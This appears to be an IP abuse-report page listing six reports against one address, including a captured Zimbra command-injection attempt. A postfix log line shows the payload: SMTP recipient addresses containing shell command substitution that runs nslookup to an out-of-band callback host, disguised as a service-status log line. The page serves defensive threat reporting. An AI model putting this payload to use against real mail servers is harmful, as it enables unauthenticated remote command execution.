This IP address has been reported a total of
6
times from
6 distinct
sources.
193.42.24.68 was first reported on
, and the most recent report was
.
Recent Reports:
We have received reports of abusive activity from this IP address within the last week. It is
potentially still actively engaged in abusive activities.
Detected by SiberKapan threat intelligence platform (siberkapan.org). Attack types: honeypot_smtp. S ...
show moreDetected by SiberKapan threat intelligence platform (siberkapan.org). Attack types: honeypot_smtp. Sources: honeypot. First seen: 2026-09-02. Risk score: 30/100.
show less
Port Scan
Anonymous
Unauthenticated remote command injection against a Zimbra mail server (CVE-2026-73570). Sent SMTP en ...
show moreUnauthenticated remote command injection against a Zimbra mail server (CVE-2026-73570). Sent SMTP envelope addresses containing shell command substitution, crafted to imitate a Zimbra service-status log line so the SNMP notification handler would execute the embedded command. Observed on ports 25 and 587. Observed 2026-09-02, ongoing exploitation attempts.
show less
Sep 2 06:26:00 mail postfix/smtps/smtpd[1053075]: NOQUEUE: reject: RCPT from unknown[193.42.24.68]: ...
show moreSep 2 06:26:00 mail postfix/smtps/smtpd[1053075]: NOQUEUE: reject: RCPT from unknown[193.42.24.68]: 554 5.7.1 <x: Service status change: localhost $(nslookup 79-9-130-8.66b0bb.gk9cw3.ceye.io) changed from stopped to [email protected]>: Recipient address rejected: Access denied; from=<[email protected]> to=<"x: Service status change: localhost $(nslookup 79-9-130-8.66b0bb.gk9cw3.ceye.io) changed from stopped to running"@cve.invalid> proto=ESMTP helo=<mx-test.invalid>
...
show less
Brute-Force
Showing 1 to
6
of 6 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown ๐ฉ